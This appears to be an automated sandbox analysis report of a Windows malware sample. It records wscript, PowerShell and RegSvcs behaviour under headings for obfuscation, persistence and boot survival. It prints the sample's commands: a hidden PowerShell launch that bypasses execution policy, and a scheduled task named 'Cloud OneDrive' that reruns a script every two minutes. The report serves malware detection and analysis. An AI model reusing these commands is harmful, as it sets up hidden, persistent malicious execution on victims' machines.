        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $var1 = $([char", "0", "false");
        Source: 22.2.RegSvcs.exe.5190000.0.raw.unpack, g.cs.Net Code: _1
        Source: 22.2.RegSvcs.exe.5190000.0.raw.unpack, g.cs.Net Code: _5 System.AppDomain.Load(byte[])
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DC74FB push ebx; iretd 2_2_00007FF848DC756A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_00B7021D push esi; iretd 22_2_00B7021E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_00B70082 push ss; retf 22_2_00B70174
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_00B70000 push ss; retf 22_2_00B70174
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_00B70051 push ss; retf 22_2_00B70174

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe

        Boot Survival

        barindex
        Source: Yara matchFile source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTR
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
